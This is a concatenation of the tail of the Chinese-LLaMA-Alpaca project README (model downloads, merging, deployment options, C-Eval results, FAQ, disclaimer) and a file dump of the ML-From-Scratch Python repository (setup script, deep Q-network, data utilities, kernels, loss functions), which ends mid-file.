由于训练方式和训练数据等因素影响,**以下模型已不再推荐使用(特定场景下可能仍然有用)**,请优先使用上一节中的[推荐模型](#推荐下载模型)。 | 模型名称 | 类型 | 训练数据 | 重构模型 | 大小 | LoRA下载 | | :---------------- | :------: | :------: | :--------------------: | :----------------: | :----------------------------------------------------------: | | Chinese-LLaMA-7B | 基座模型 | 通用20G | 原版LLaMA-7B | 770M | [[百度]](https://pan.baidu.com/s/1oORTdpr2TvlkxjpyWtb5Sw?pwd=33hb) [[Google]](https://drive.google.com/file/d/1iQp9T-BHjBjIrFWXq_kIm_cyNmpvv5WN/view?usp=sharing)<br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-lora-7b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-lora-7b) | | Chinese-LLaMA-13B | 基座模型 | 通用20G | 原版LLaMA-13B | 1.0G | [[百度]](https://pan.baidu.com/s/1BxFhYhDMipW7LwI58cGmQQ?pwd=ef3t) [[Google]](https://drive.google.com/file/d/12q9EH4mfKRnoKlbkkhzv1xDwWnroo9VS/view?usp=sharing) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-lora-13b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-lora-13b) | | Chinese-LLaMA-33B | 基座模型 | 通用20G | 原版LLaMA-33B | 2.7G | [[百度]](https://pan.baidu.com/s/1-ylGyeM70QZ5vbEug5RD-A?pwd=hp6f) [[Google]](https://drive.google.com/file/d/1NwsLYbuEByUxre5GqTN5EkxiuZSRxUy_/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-llama-lora-33b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-llama-lora-33b)| | Chinese-Alpaca-7B | 指令模型 | 指令2M | 原版LLaMA-7B | 790M | [[百度]](https://pan.baidu.com/s/1xV1UXjh1EPrPtXg6WyG7XQ?pwd=923e) [[Google]](https://drive.google.com/file/d/1JvFhBpekYiueWiUL3AF1TtaWDb3clY5D/view?usp=sharing) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-lora-7b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-lora-7b) | | Chinese-Alpaca-13B | 指令模型 | 指令3M | 原版LLaMA-13B | 1.1G | [[百度]](https://pan.baidu.com/s/1wYoSF58SnU9k0Lndd5VEYg?pwd=mm8i) [[Google]](https://drive.google.com/file/d/1gzMc0xMCpXsXmU1uxFlgQ8VRnWNtDjD8/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-lora-13b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-lora-13b)| | Chinese-Alpaca-33B | 指令模型 | 指令4.3M | 原版LLaMA-33B | 2.8G | [[百度]](https://pan.baidu.com/s/1fey7lGMMw3GT982l8uJYMg?pwd=2f2s) [[Google]](https://drive.google.com/file/d/1YeSgnZWaRkKdmYa-JHiIlcvqhrDd4-Y4/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-lora-33b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-lora-33b) | | Chinese-Alpaca-Plus-7B | 指令模型 | 指令4M | *原版LLaMA-7B &<br/>LLaMA-Plus-7B* | 1.1G | [[百度]](https://pan.baidu.com/s/12tjjxmDWwLBM8Tj_7FAjHg?pwd=32hc) [[Google]](https://drive.google.com/file/d/1EDcTmq6tDmRxqarpapdyDGBE9opY0zrB/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-plus-lora-7b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-plus-lora-7b) | | Chinese-Alpaca-Plus-13B | 指令模型 | 指令4.3M | *原版LLaMA-13B &<br/>LLaMA-Plus-13B* | 1.3G | [[百度]](https://pan.baidu.com/s/1Mew4EjBlejWBBB6_WW6vig?pwd=mf5w) [[Google]](https://drive.google.com/file/d/1CcLJvY7XsFAOjfSIqCpDI7jf3EEPDcEF/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-plus-lora-13b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-plus-lora-13b)| | Chinese-Alpaca-Plus-33B | 指令模型 | 指令4.3M | *原版LLaMA-33B &<br/>LLaMA-Plus-33B* | 2.1G | [[百度]](https://pan.baidu.com/s/1j2prOjiQGB8S5x67Uj8XZw?pwd=3pac) [[Google]](https://drive.google.com/file/d/1YUaT-NOReoF-z1vzj2khwYKdj4Z_ekbO/view?usp=share_link) <br/>[[🤗HF]](https://huggingface.co/hfl/chinese-alpaca-plus-lora-33b) [[🤖ModelScope]](https://modelscope.cn/models/ChineseAlpacaGroup/chinese-alpaca-plus-lora-33b)| ### 🤗transformers调用 可以在🤗Model Hub下载以上所有模型,并且使用[transformers](https://github.com/huggingface/transformers)和[PEFT](https://github.com/huggingface/peft)调用中文LLaMA或Alpaca LoRA模型。以下模型调用名称指的是使用`.from_pretrained()`中指定的模型名称。 详细清单与模型下载地址:https://huggingface.co/hfl ## 合并模型 前面提到LoRA模型无法单独使用,必须与原版LLaMA进行合并才能转为完整模型,以便进行模型推理、量化或者进一步训练。请选择以下方法对模型进行转换合并。 | 方式 | 适用场景 | 教程 | | :----------- | :--------------------------------------------------------- | :----------------------------------------------------------: | | **在线转换** | Colab用户可利用本项目提供的notebook进行在线转换并量化模型 | [链接](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/在线模型合并与转换) | | **手动转换** | 离线方式转换,生成不同格式的模型,以便进行量化或进一步精调 | [链接](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/手动模型合并与转换) | 以下是合并模型后,FP16精度和4-bit量化后的大小,转换前确保本机有足够的内存和磁盘空间(最低要求): | 模型版本 | 7B | 13B | 33B | 65B | | :------------------ | :----: | :-----: | :-----: | :-----: | | 原模型大小(FP16) | 13 GB | 24 GB | 60 GB | 120 GB | | 量化后大小(8-bit) | 7.8 GB | 14.9 GB | 32.4 GB | ~60 GB | | 量化后大小(4-bit) | 3.9 GB | 7.8 GB | 17.2 GB | 38.5 GB | 具体内容请参考本项目 >>> [📚 GitHub Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/模型合并与转换) ## 本地推理与快速部署 本项目中的模型主要支持以下量化、推理和部署方式。 | 推理和部署方式 | 特点 | 平台 | CPU | GPU | 量化加载 | 图形界面 | 教程 | | :----------------------------------------------------------- | -------------------------------------------- | :---: | :--: | :--: | :------: | :------: | :----------------------------------------------------------: | | [**llama.cpp**](https://github.com/ggerganov/llama.cpp) | 丰富的量化选项和高效本地推理 | 通用 | ✅ | ✅ | ✅ | ❌ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/llama.cpp量化部署) | | [**🤗Transformers**](https://github.com/huggingface/transformers) | 原生transformers推理接口 | 通用 | ✅ | ✅ | ✅ | ✅ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/使用Transformers推理) | | [**text-generation-webui**](https://github.com/oobabooga/text-generation-webui) | 前端Web UI界面的部署方式 | 通用 | ✅ | ✅ | ✅ | ✅ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/使用text-generation-webui搭建界面) | | [**LlamaChat**](https://github.com/alexrozanski/LlamaChat) | macOS下的图形交互界面 | MacOS | ✅ | ❌ | ✅ | ✅ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/使用LlamaChat图形界面(macOS)) | | [**LangChain**](https://github.com/hwchase17/langchain) | LLM应用开发框架,适用于进行二次开发 | 通用 | ✅<sup>†</sup> | ✅ | ✅<sup>†</sup> | ❌ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/与LangChain进行集成) | | [**privateGPT**](https://github.com/imartinez/privateGPT) | 基于LangChain的多文档本地问答框架 | 通用 | ✅ | ✅ | ✅ | ❌ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/使用privateGPT进行多文档问答) | | [**Colab Gradio Demo**](https://github.com/ymcui/Chinese-LLaMA-Alpaca/blob/main/notebooks/gradio_web_demo.ipynb) | Colab中启动基于Gradio的交互式Web服务 | 通用 | ✅ | ✅ | ✅ | ❌ | [link](https://colab.research.google.com/github/ymcui/Chinese-LLaMA-Alpaca/blob/main/notebooks/gradio_web_demo.ipynb) | | [**API调用**](https://platform.openai.com/docs/api-reference) | 仿OpenAI API接口的服务器Demo | 通用 | ✅ | ✅ | ✅ | ❌ | [link](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/API调用) | <sup>†</sup>: LangChain框架支持,但教程中未实现;详细说明请参考LangChain官方文档。 具体内容请参考本项目 >>> [📚 GitHub Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/模型推理与部署) ## 系统效果 ### 生成效果评测 为了快速评测相关模型的实际文本生成表现,本项目在给定相同的prompt的情况下,在一些常见任务上对比测试了本项目的中文Alpaca-7B、中文Alpaca-13B、中文Alpaca-33B、中文Alpaca-Plus-7B、中文Alpaca-Plus-13B的效果。生成回复具有随机性,受解码超参、随机种子等因素影响。以下相关评测并非绝对严谨,测试结果仅供晾晒参考,欢迎自行体验。 - 详细评测结果及生成样例请查看[examples目录](./examples) - 📊 Alpaca模型在线对战:[http://llm-arena.ymcui.com](http://llm-arena.ymcui.com/) ### 客观效果评测 本项目还在“NLU”类客观评测集合上对相关模型进行了测试。这类评测的结果不具有主观性,只需要输出给定标签(需要设计标签mapping策略),因此可以从另外一个侧面了解大模型的能力。本项目在近期推出的[C-Eval评测数据集](https://cevalbenchmark.com)上测试了相关模型效果,其中测试集包含12.3K个选择题,涵盖52个学科。以下是部分模型的valid和test集评测结果(Average),完整结果请参考[技术报告](https://arxiv.org/abs/2304.08177)。 | 模型 | Valid (zero-shot) | Valid (5-shot) | Test (zero-shot) | Test (5-shot) | | ----------------------- | :---------------: | :------------: | :--------------: | :-----------: | | Chinese-Alpaca-Plus-33B | 46.5 | 46.3 | 44.9 | 43.5 | | Chinese-Alpaca-33B | 43.3 | 42.6 | 41.6 | 40.4 | | Chinese-Alpaca-Plus-13B | 43.3 | 42.4 | 41.5 | 39.9 | | Chinese-Alpaca-Plus-7B | 36.7 | 32.9 | 36.4 | 32.3 | | Chinese-LLaMA-Plus-33B | 37.4 | 40.0 | 35.7 | 38.3 | | Chinese-LLaMA-33B | 34.9 | 38.4 | 34.6 | 39.5 | | Chinese-LLaMA-Plus-13B | 27.3 | 34.0 | 27.8 | 33.3 | | Chinese-LLaMA-Plus-7B | 27.3 | 28.3 | 26.9 | 28.4 | 需要注意的是,综合评估大模型能力仍然是亟待解决的重要课题,合理辩证地看待大模型相关各种评测结果有助于大模型技术的良性发展。推荐用户在自己关注的任务上进行测试,选择适配相关任务的模型。 C-Eval推理代码请参考本项目 >>> [📚 GitHub Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/C-Eval评测结果与脚本) ## 训练细节 整个训练流程包括词表扩充、预训练和指令精调三部分。 - 本项目的模型均在原LLaMA词表的基础上扩充了中文单词,代码请参考[merge_tokenizers.py](./scripts/merge_tokenizer/merge_tokenizers.py) - 预训练和指令精调代码参考了🤗transformers中的[run_clm.py](https://github.com/huggingface/transformers/blob/main/examples/pytorch/language-modeling/run_clm.py)和[Stanford Alpaca](https://github.com/tatsu-lab/stanford_alpaca)项目中数据集处理的相关部分 - 已开源用于预训练和指令精调的训练脚本:[预训练脚本Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/预训练脚本)、[指令精调脚本Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/指令精调脚本) 具体内容请参考本项目 >>> [📚 GitHub Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/训练细节) ## FAQ FAQ中给出了常见问题的解答,请在提Issue前务必先查看FAQ。 ``` 问题1:为什么不能放出完整版本权重? 问题2:后面会有33B、65B的版本吗? 问题3:一些任务上效果不好! 问题4:为什么要扩充词表?直接在原版LLaMA上用中文预训练不行吗? 问题5:回复内容很短 问题6:Windows下,模型无法理解中文、生成速度很慢等问题 问题7:Chinese-LLaMA 13B模型没法用llama.cpp启动,提示维度不一致 问题8:Chinese-Alpaca-Plus效果很差 问题9:模型在NLU类任务(文本分类等)上效果不好 问题10:为什么叫33B,不应该是30B吗? 问题11:模型合并之后SHA256不一致 ``` 具体问题和解答请参考本项目 >>> [📚 GitHub Wiki](https://github.com/ymcui/Chinese-LLaMA-Alpaca/wiki/常见问题) ## 局限性 虽然本项目中的模型具备一定的中文理解和生成能力,但也存在局限性,包括但不限于: - 可能会产生不可预测的有害内容以及不符合人类偏好和价值观的内容 - 由于算力和数据问题,相关模型的训练并不充分,中文理解能力有待进一步提升 - 暂时没有在线可互动的demo(注:用户仍然可以自行在本地部署) ## 引用 如果您觉得本项目对您的研究有所帮助或使用了本项目的代码或数据,请参考引用本项目的技术报告:https://arxiv.org/abs/2304.08177 ``` @article{chinese-llama-alpaca, title={Efficient and Effective Text Encoding for Chinese LLaMA and Alpaca}, author={Cui, Yiming and Yang, Ziqing and Yao, Xin}, journal={arXiv preprint arXiv:2304.08177}, url={https://arxiv.org/abs/2304.08177}, year={2023} } ``` ## 相关项目 | 项目名称 | 简介 | 类型 | | :----------------------------------------------------------- | :----------------------------- | :----: | | [**Chinese-LLaMA-Alpaca-2**](https://github.com/ymcui/Chinese-LLaMA-Alpaca-2)(官方项目) | 中文LLaMA-2、Alpaca-2大模型 | 文本 | | [**Visual-Chinese-LLaMA-Alpaca**](https://github.com/airaria/Visual-Chinese-LLaMA-Alpaca)(官方项目) | 多模态中文LLaMA & Alpaca大模型 | 多模态 | 想要加入列表?>>> [提交申请](https://github.com/ymcui/Chinese-LLaMA-Alpaca/discussions/740) ## 致谢 本项目基于以下开源项目二次开发,在此对相关项目和研究开发人员表示感谢。 | 基础模型、代码 | 量化、推理、部署 | 数据 | | :----------------------------------------------------------: | :----------------------------------------------------------: | :----------------------------------------------------------: | | [LLaMA by Facebook](https://github.com/facebookresearch/llama)<br/>[Alpaca by Stanford](https://github.com/tatsu-lab/stanford_alpaca)<br/>[alpaca-lora by @tloen](https://github.com/tloen/alpaca-lora) | [llama.cpp by @ggerganov](https://github.com/ggerganov/llama.cpp)<br/>[LlamaChat by @alexrozanski]( https://github.com/alexrozanski/LlamaChat)<br/>[text-generation-webui by @oobabooga](https://github.com/oobabooga/text-generation-webui) | [pCLUE and MT data by @brightmart](https://github.com/brightmart/nlp_chinese_corpus)<br/>[oasst1 by OpenAssistant](https://huggingface.co/datasets/OpenAssistant/oasst1) | ## 免责声明 **本项目相关资源仅供学术研究之用,严禁用于商业用途。** 使用涉及第三方代码的部分时,请严格遵循相应的开源协议。模型生成的内容受模型计算、随机性和量化精度损失等因素影响,本项目不对其准确性作出保证。对于模型输出的任何内容,本项目不承担任何法律责任,亦不对因使用相关资源和输出结果而可能产生的任何损失承担责任。本项目由个人及协作者业余时间发起并维护,因此无法保证能及时回复解决相应问题。 ## 问题反馈 如有问题,请在GitHub Issue中提交。礼貌地提出问题,构建和谐的讨论社区。 - 在提交问题之前,请先查看FAQ能否解决问题,同时建议查阅以往的issue是否能解决你的问题。 - 提交问题请使用本项目设置的Issue模板,以帮助快速定位具体问题。 - 重复以及与本项目无关的issue会被[stable-bot](https://github.com/marketplace/stale)处理,敬请谅解。
ML-From-Scratch
a2806c6732eee8d27762edd6d864e0c179d8e9e8
File: setup.py from setuptools import setup, find_packages from codecs import open from os import path __version__ = '0.0.4' here = path.abspath(path.dirname(__file__)) # get the dependencies and installs with open(path.join(here, 'requirements.txt'), encoding='utf-8') as f: all_reqs = f.read().split('\n') install_requires = [x.strip() for x in all_reqs if 'git+' not in x] dependency_links = [x.strip().replace('git+', '') for x in all_reqs if x.startswith('git+')] setup( name='mlfromscratch', version=__version__, description='Python implementations of some of the fundamental Machine Learning models and algorithms from scratch.', url='https://github.com/eriklindernoren/ML-From-Scratch', download_url='https://github.com/eriklindernoren/ML-From-Scratch/tarball/master', license='MIT', packages=find_packages(), include_package_data=True, author='Erik Linder-Noren', install_requires=install_requires, setup_requires=['numpy>=1.10', 'scipy>=0.17'], dependency_links=dependency_links, author_email='[email protected]' ) File: mlfromscratch/__init__.py File: mlfromscratch/reinforcement_learning/__init__.py from .deep_q_network import DeepQNetwork File: mlfromscratch/reinforcement_learning/deep_q_network.py from __future__ import print_function, division import random import numpy as np import gym from collections import deque class DeepQNetwork(): """Q-Learning with deep neural network to learn the control policy. Uses a deep neural network model to predict the expected utility (Q-value) of executing an action in a given state. Reference: https://arxiv.org/abs/1312.5602 Parameters: ----------- env_name: string The environment that the agent will explore. Check: https://gym.openai.com/envs epsilon: float The epsilon-greedy value. The probability that the agent should select a random action instead of the action that will maximize the expected utility. gamma: float Determines how much the agent should consider future rewards. decay_rate: float The rate of decay for the epsilon value after each epoch. min_epsilon: float The value which epsilon will approach as the training progresses. """ def __init__(self, env_name='CartPole-v1', epsilon=1, gamma=0.9, decay_rate=0.005, min_epsilon=0.1): self.epsilon = epsilon self.gamma = gamma self.decay_rate = decay_rate self.min_epsilon = min_epsilon self.memory_size = 300 self.memory = [] # Initialize the environment self.env = gym.make(env_name) self.n_states = self.env.observation_space.shape[0] self.n_actions = self.env.action_space.n def set_model(self, model): self.model = model(n_inputs=self.n_states, n_outputs=self.n_actions) def _select_action(self, state): if np.random.rand() < self.epsilon: # Choose action randomly action = np.random.randint(self.n_actions) else: # Take action with highest predicted utility given state action = np.argmax(self.model.predict(state), axis=1)[0] return action def _memorize(self, state, action, reward, new_state, done): self.memory.append((state, action, reward, new_state, done)) # Make sure we restrict memory size to specified limit if len(self.memory) > self.memory_size: self.memory.pop(0) def _construct_training_set(self, replay): # Select states and new states from replay states = np.array([a[0] for a in replay]) new_states = np.array([a[3] for a in replay]) # Predict the expected utility of current state and new state Q = self.model.predict(states) Q_new = self.model.predict(new_states) replay_size = len(replay) X = np.empty((replay_size, self.n_states)) y = np.empty((replay_size, self.n_actions)) # Construct training set for i in range(replay_size): state_r, action_r, reward_r, new_state_r, done_r = replay[i] target = Q[i] target[action_r] = reward_r # If we're done the utility is simply the reward of executing action a in # state s, otherwise we add the expected maximum future reward as well if not done_r: target[action_r] += self.gamma * np.amax(Q_new[i]) X[i] = state_r y[i] = target return X, y def train(self, n_epochs=500, batch_size=32): max_reward = 0 for epoch in range(n_epochs): state = self.env.reset() total_reward = 0 epoch_loss = [] while True: action = self._select_action(state) # Take a step new_state, reward, done, _ = self.env.step(action) self._memorize(state, action, reward, new_state, done) # Sample replay batch from memory _batch_size = min(len(self.memory), batch_size) replay = random.sample(self.memory, _batch_size) # Construct training set from replay X, y = self._construct_training_set(replay) # Learn control policy loss = self.model.train_on_batch(X, y) epoch_loss.append(loss) total_reward += reward state = new_state if done: break epoch_loss = np.mean(epoch_loss) # Reduce the epsilon parameter self.epsilon = self.min_epsilon + (1.0 - self.min_epsilon) * np.exp(-self.decay_rate * epoch) max_reward = max(max_reward, total_reward) print ("%d [Loss: %.4f, Reward: %s, Epsilon: %.4f, Max Reward: %s]" % (epoch, epoch_loss, total_reward, self.epsilon, max_reward)) print ("Training Finished") def play(self, n_epochs): # self.env = gym.wrappers.Monitor(self.env, '/tmp/cartpole-experiment-1', force=True) for epoch in range(n_epochs): state = self.env.reset() total_reward = 0 while True: self.env.render() action = np.argmax(self.model.predict(state), axis=1)[0] state, reward, done, _ = self.env.step(action) total_reward += reward if done: break print ("%d Reward: %s" % (epoch, total_reward)) self.env.close() File: mlfromscratch/utils/misc.py import progressbar from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt import matplotlib.cm as cmx import matplotlib.colors as colors import numpy as np from mlfromscratch.utils.data_operation import calculate_covariance_matrix from mlfromscratch.utils.data_operation import calculate_correlation_matrix from mlfromscratch.utils.data_manipulation import standardize bar_widgets = [ 'Training: ', progressbar.Percentage(), ' ', progressbar.Bar(marker="-", left="[", right="]"), ' ', progressbar.ETA() ] class Plot(): def __init__(self): self.cmap = plt.get_cmap('viridis') def _transform(self, X, dim): covariance = calculate_covariance_matrix(X) eigenvalues, eigenvectors = np.linalg.eig(covariance) # Sort eigenvalues and eigenvector by largest eigenvalues idx = eigenvalues.argsort()[::-1] eigenvalues = eigenvalues[idx][:dim] eigenvectors = np.atleast_1d(eigenvectors[:, idx])[:, :dim] # Project the data onto principal components X_transformed = X.dot(eigenvectors) return X_transformed def plot_regression(self, lines, title, axis_labels=None, mse=None, scatter=None, legend={"type": "lines", "loc": "lower right"}): if scatter: scatter_plots = scatter_labels = [] for s in scatter: scatter_plots += [plt.scatter(s["x"], s["y"], color=s["color"], s=s["size"])] scatter_labels += [s["label"]] scatter_plots = tuple(scatter_plots) scatter_labels = tuple(scatter_labels) for l in lines: li = plt.plot(l["x"], l["y"], color=s["color"], linewidth=l["width"], label=l["label"]) if mse: plt.suptitle(title) plt.title("MSE: %.2f" % mse, fontsize=10) else: plt.title(title) if axis_labels: plt.xlabel(axis_labels["x"]) plt.ylabel(axis_labels["y"]) if legend["type"] == "lines": plt.legend(loc="lower_left") elif legend["type"] == "scatter" and scatter: plt.legend(scatter_plots, scatter_labels, loc=legend["loc"]) plt.show() # Plot the dataset X and the corresponding labels y in 2D using PCA. def plot_in_2d(self, X, y=None, title=None, accuracy=None, legend_labels=None): X_transformed = self._transform(X, dim=2) x1 = X_transformed[:, 0] x2 = X_transformed[:, 1] class_distr = [] y = np.array(y).astype(int) colors = [self.cmap(i) for i in np.linspace(0, 1, len(np.unique(y)))] # Plot the different class distributions for i, l in enumerate(np.unique(y)): _x1 = x1[y == l] _x2 = x2[y == l] _y = y[y == l] class_distr.append(plt.scatter(_x1, _x2, color=colors[i])) # Plot legend if not legend_labels is None: plt.legend(class_distr, legend_labels, loc=1) # Plot title if title: if accuracy: perc = 100 * accuracy plt.suptitle(title) plt.title("Accuracy: %.1f%%" % perc, fontsize=10) else: plt.title(title) # Axis labels plt.xlabel('Principal Component 1') plt.ylabel('Principal Component 2') plt.show() # Plot the dataset X and the corresponding labels y in 3D using PCA. def plot_in_3d(self, X, y=None): X_transformed = self._transform(X, dim=3) x1 = X_transformed[:, 0] x2 = X_transformed[:, 1] x3 = X_transformed[:, 2] fig = plt.figure() ax = fig.add_subplot(111, projection='3d') ax.scatter(x1, x2, x3, c=y) plt.show() File: mlfromscratch/utils/data_operation.py from __future__ import division import numpy as np import math import sys def calculate_entropy(y): """ Calculate the entropy of label array y """ log2 = lambda x: math.log(x) / math.log(2) unique_labels = np.unique(y) entropy = 0 for label in unique_labels: count = len(y[y == label]) p = count / len(y) entropy += -p * log2(p) return entropy def mean_squared_error(y_true, y_pred): """ Returns the mean squared error between y_true and y_pred """ mse = np.mean(np.power(y_true - y_pred, 2)) return mse def calculate_variance(X): """ Return the variance of the features in dataset X """ mean = np.ones(np.shape(X)) * X.mean(0) n_samples = np.shape(X)[0] variance = (1 / n_samples) * np.diag((X - mean).T.dot(X - mean)) return variance def calculate_std_dev(X): """ Calculate the standard deviations of the features in dataset X """ std_dev = np.sqrt(calculate_variance(X)) return std_dev def euclidean_distance(x1, x2): """ Calculates the l2 distance between two vectors """ distance = 0 # Squared distance between each coordinate for i in range(len(x1)): distance += pow((x1[i] - x2[i]), 2) return math.sqrt(distance) def accuracy_score(y_true, y_pred): """ Compare y_true to y_pred and return the accuracy """ accuracy = np.sum(y_true == y_pred, axis=0) / len(y_true) return accuracy def calculate_covariance_matrix(X, Y=None): """ Calculate the covariance matrix for the dataset X """ if Y is None: Y = X n_samples = np.shape(X)[0] covariance_matrix = (1 / (n_samples-1)) * (X - X.mean(axis=0)).T.dot(Y - Y.mean(axis=0)) return np.array(covariance_matrix, dtype=float) def calculate_correlation_matrix(X, Y=None): """ Calculate the correlation matrix for the dataset X """ if Y is None: Y = X n_samples = np.shape(X)[0] covariance = (1 / n_samples) * (X - X.mean(0)).T.dot(Y - Y.mean(0)) std_dev_X = np.expand_dims(calculate_std_dev(X), 1) std_dev_y = np.expand_dims(calculate_std_dev(Y), 1) correlation_matrix = np.divide(covariance, std_dev_X.dot(std_dev_y.T)) return np.array(correlation_matrix, dtype=float) File: mlfromscratch/utils/__init__.py from .misc import Plot from .data_manipulation import * from .data_operation import * File: mlfromscratch/utils/data_manipulation.py from __future__ import division from itertools import combinations_with_replacement import numpy as np import math import sys def shuffle_data(X, y, seed=None): """ Random shuffle of the samples in X and y """ if seed: np.random.seed(seed) idx = np.arange(X.shape[0]) np.random.shuffle(idx) return X[idx], y[idx] def batch_iterator(X, y=None, batch_size=64): """ Simple batch generator """ n_samples = X.shape[0] for i in np.arange(0, n_samples, batch_size): begin, end = i, min(i+batch_size, n_samples) if y is not None: yield X[begin:end], y[begin:end] else: yield X[begin:end] def divide_on_feature(X, feature_i, threshold): """ Divide dataset based on if sample value on feature index is larger than the given threshold """ split_func = None if isinstance(threshold, int) or isinstance(threshold, float): split_func = lambda sample: sample[feature_i] >= threshold else: split_func = lambda sample: sample[feature_i] == threshold X_1 = np.array([sample for sample in X if split_func(sample)]) X_2 = np.array([sample for sample in X if not split_func(sample)]) return np.array([X_1, X_2]) def polynomial_features(X, degree): n_samples, n_features = np.shape(X) def index_combinations(): combs = [combinations_with_replacement(range(n_features), i) for i in range(0, degree + 1)] flat_combs = [item for sublist in combs for item in sublist] return flat_combs combinations = index_combinations() n_output_features = len(combinations) X_new = np.empty((n_samples, n_output_features)) for i, index_combs in enumerate(combinations): X_new[:, i] = np.prod(X[:, index_combs], axis=1) return X_new def get_random_subsets(X, y, n_subsets, replacements=True): """ Return random subsets (with replacements) of the data """ n_samples = np.shape(X)[0] # Concatenate x and y and do a random shuffle X_y = np.concatenate((X, y.reshape((1, len(y))).T), axis=1) np.random.shuffle(X_y) subsets = [] # Uses 50% of training samples without replacements subsample_size = int(n_samples // 2) if replacements: subsample_size = n_samples # 100% with replacements for _ in range(n_subsets): idx = np.random.choice( range(n_samples), size=np.shape(range(subsample_size)), replace=replacements) X = X_y[idx][:, :-1] y = X_y[idx][:, -1] subsets.append([X, y]) return subsets def normalize(X, axis=-1, order=2): """ Normalize the dataset X """ l2 = np.atleast_1d(np.linalg.norm(X, order, axis)) l2[l2 == 0] = 1 return X / np.expand_dims(l2, axis) def standardize(X): """ Standardize the dataset X """ X_std = X mean = X.mean(axis=0) std = X.std(axis=0) for col in range(np.shape(X)[1]): if std[col]: X_std[:, col] = (X_std[:, col] - mean[col]) / std[col] # X_std = (X - X.mean(axis=0)) / X.std(axis=0) return X_std def train_test_split(X, y, test_size=0.5, shuffle=True, seed=None): """ Split the data into train and test sets """ if shuffle: X, y = shuffle_data(X, y, seed) # Split the training data from test data in the ratio specified in # test_size split_i = len(y) - int(len(y) // (1 / test_size)) X_train, X_test = X[:split_i], X[split_i:] y_train, y_test = y[:split_i], y[split_i:] return X_train, X_test, y_train, y_test def k_fold_cross_validation_sets(X, y, k, shuffle=True): """ Split the data into k sets of training / test data """ if shuffle: X, y = shuffle_data(X, y) n_samples = len(y) left_overs = {} n_left_overs = (n_samples % k) if n_left_overs != 0: left_overs["X"] = X[-n_left_overs:] left_overs["y"] = y[-n_left_overs:] X = X[:-n_left_overs] y = y[:-n_left_overs] X_split = np.split(X, k) y_split = np.split(y, k) sets = [] for i in range(k): X_test, y_test = X_split[i], y_split[i] X_train = np.concatenate(X_split[:i] + X_split[i + 1:], axis=0) y_train = np.concatenate(y_split[:i] + y_split[i + 1:], axis=0) sets.append([X_train, X_test, y_train, y_test]) # Add left over samples to last set as training samples if n_left_overs != 0: np.append(sets[-1][0], left_overs["X"], axis=0) np.append(sets[-1][2], left_overs["y"], axis=0) return np.array(sets) def to_categorical(x, n_col=None): """ One-hot encoding of nominal values """ if not n_col: n_col = np.amax(x) + 1 one_hot = np.zeros((x.shape[0], n_col)) one_hot[np.arange(x.shape[0]), x] = 1 return one_hot def to_nominal(x): """ Conversion from one-hot encoding to nominal """ return np.argmax(x, axis=1) def make_diagonal(x): """ Converts a vector into an diagonal matrix """ m = np.zeros((len(x), len(x))) for i in range(len(m[0])): m[i, i] = x[i] return m File: mlfromscratch/utils/kernels.py import numpy as np def linear_kernel(**kwargs): def f(x1, x2): return np.inner(x1, x2) return f def polynomial_kernel(power, coef, **kwargs): def f(x1, x2): return (np.inner(x1, x2) + coef)**power return f def rbf_kernel(gamma, **kwargs): def f(x1, x2): distance = np.linalg.norm(x1 - x2) ** 2 return np.exp(-gamma * distance) return f File: mlfromscratch/deep_learning/loss_functions.py from __future__ import division import numpy as np from mlfromscratch.utils import accuracy_score from mlfromscratch.deep_learning.activation_functions import Sigmoid class Loss(object): def loss(self, y_true, y_pred): return NotImplementedError() def gradient(self, y, y_pred): raise NotImplementedError() def acc(self, y, y_pred): return 0 class SquareLoss(Loss): def __init__(self): pass def loss(self, y, y_pred): return 0.5 * np.power((y - y_pred), 2) def gradient(self, y, y_pred): return -(y - y_pred) class CrossEntropy(Loss): def __init__(self): pass def loss(self, y, p): # Avoid division by zero p = np.clip(p, 1e-15, 1 - 1e-15) return - y * np.log(p) - (1 - y) * np.log(1 - p) def acc(self, y, p): return accuracy_score(np.argmax(y, axis=1), np.argmax(p, axis=1)) def gradient(self, y, p): # Avoid division by zero p = np.clip(p, 1e-15, 1 - 1e-15) return - (y / p) + (1 - y) / (1 - p) File: mlfromscratch/deep_learning/activation_functions.py import numpy as np # Collection of activation functions # Reference: https://en.wikipedia.org/wiki/Activation_function class Sigmoid(): def __call__(self, x): return 1 / (1 + 